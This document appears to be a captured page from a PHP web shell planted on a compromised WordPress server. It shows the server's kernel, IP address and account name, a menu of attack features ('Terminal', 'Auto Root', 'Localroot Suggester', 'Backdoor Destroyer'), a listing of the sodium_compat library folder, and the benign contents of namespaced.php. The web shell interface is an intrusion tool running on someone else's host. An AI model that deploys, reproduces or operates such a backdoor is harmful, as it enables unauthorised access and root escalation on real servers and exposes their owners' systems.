Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.217.64
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
georgeto /
wp-includes /
sodium_compat /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
constants.php
4.06
KB
-rw-r--r--
2024-11-23 13:12
namespaced.php
1.31
KB
-rw-r--r--
2024-11-23 13:12
php72compat.php
46.24
KB
-rw-r--r--
2024-11-23 13:12
php72compat_const.php
4.49
KB
-rw-r--r--
2024-11-23 13:12
php84compat.php
3.57
KB
-rw-r--r--
2024-11-23 13:12
php84compat_const.php
401
B
-rw-r--r--
2024-11-23 13:12
ristretto255.php
7.79
KB
-rw-r--r--
2024-11-23 13:12
sodium_compat.php
26.8
KB
-rw-r--r--
2024-11-23 13:12
stream-xchacha20.php
2.03
KB
-rw-r--r--
2024-11-23 13:12
Save
Rename
<?php require_once dirname(dirname(__FILE__)) . '/autoload.php'; if (PHP_VERSION_ID < 50300) { return; } /* * This file is just for convenience, to allow developers to reduce verbosity when * they add this project to their libraries. * * Replace this: * * $x = ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_encrypt(...$args); * * with this: * * use ParagonIE\Sodium\Compat; * * $x = Compat::crypto_aead_xchacha20poly1305_encrypt(...$args); */ spl_autoload_register(function ($class) { if ($class[0] === '\\') { $class = substr($class, 1); } $namespace = 'ParagonIE\\Sodium'; // Does the class use the namespace prefix? $len = strlen($namespace); if (strncmp($namespace, $class, $len) !== 0) { // no, move to the next registered autoloader return false; } // Get the relative class name $relative_class = substr($class, $len); // Replace the namespace prefix with the base directory, replace namespace // separators with directory separators in the relative class name, append // with .php $file = dirname(dirname(__FILE__)) . '/namespaced/' . str_replace('\\', '/', $relative_class) . '.php'; // if the file exists, require it if (file_exists($file)) { require_once $file; return true; } return false; });